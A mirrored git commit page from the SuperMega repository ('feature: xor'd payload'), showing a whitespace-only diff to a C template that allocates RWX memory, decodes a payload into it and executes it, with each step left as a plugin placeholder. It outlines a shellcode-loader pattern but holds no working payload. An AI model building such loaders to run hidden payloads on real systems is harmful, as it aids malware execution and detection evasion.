mirror of
https://github.com/dobin/SuperMega
synced 2026-06-03 01:27:11 +00:00
feature: xor'd payload
This commit is contained in:
@@ -18,16 +18,16 @@ int main()
|
||||
|
||||
// Allocate RWX segment
|
||||
// char *dest = ...
|
||||
{{ plugin_allocator }}
|
||||
{{ plugin_allocator }}
|
||||
|
||||
// Copy
|
||||
// from: supermega_payload[]
|
||||
// to: dest[]
|
||||
// len: 0x11223344
|
||||
{{ plugin_decoder }}
|
||||
{{ plugin_decoder }}
|
||||
|
||||
// Execute *dest
|
||||
{{ plugin_executor }}
|
||||
{{ plugin_executor }}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user